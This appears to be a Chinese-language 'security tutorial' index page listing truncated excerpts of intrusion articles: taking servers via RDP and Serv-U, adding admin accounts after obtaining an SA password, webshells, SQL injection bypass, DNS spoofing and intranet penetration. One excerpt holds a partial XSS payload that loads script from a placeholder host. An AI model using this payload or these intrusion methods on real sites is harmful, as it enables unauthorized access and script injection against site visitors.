安全教程

一：检测一下网站的服务器是否开了 3389 远程终端 二：检测一下服务是否用了serv-u （还有是什么版本的） 方法 一：复制一个网站 用 3389 登陆器连接一下 （是否成功）能连接了，拿下服务器的机率，提高 30%了 二：用ftp模式查下一个服务...

家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！ 下面先说COM的制作，在VB中新建一工程，当然是AceiveX dll的！ 1）先修改工程属性，在工...

在获得SA密码后，往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添...

后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其他电脑。 　　后门是一种登录系统的方法，它不仅绕过...

鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教. 本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句 和编程语言,知己知彼才能百战百胜. 我不希翼得到读者您的好评,尽管我尽力了;只希望本...

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了，这就是DNS欺骗的基本原理。DNS欺骗其实并...

内网渗透的思想是源于特洛伊木马的思想—堡垒最容易从内部攻破，一个大型的网站，一个大型的公司，一个大型的目标，在外肉，管理员总会千方百计的加强防范和修补漏洞，常规的方法进去几乎是不可能。 内网渗透的突破口是我们如何得到一个内网的个人机或是内网...

<img src="javascript:try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;...

突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“’”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵...

近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击，但攻击者所使用的技术并不是以往所使用的入侵WEB服务器，更改主页的惯用手法，攻击者使用的是一种域名劫持攻击？攻击者通过冒充原域名拥有者以E-MAIL方...

通过几次成功的拿Webshell，发现自己有时也走了一些弯路，为了避免其他的朋友再在困惑中迷失方向，现在我将自己的一些经验写出来，希望对一些想学拿Webshell的朋友有一定的帮助。 　　首先我们要确定我们要检测的网站，可以是自己定下的某个网站，也可以...

Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的，耍嘴皮子容易，兑现起来可就不那么容易了。不管什么计算机系统，人们总能够找到攻击它的方法，Oracle也不例外。本文将和大家从黑客的角度讨论黑客是用哪些方法把黑手伸向了你原以为他们不能触...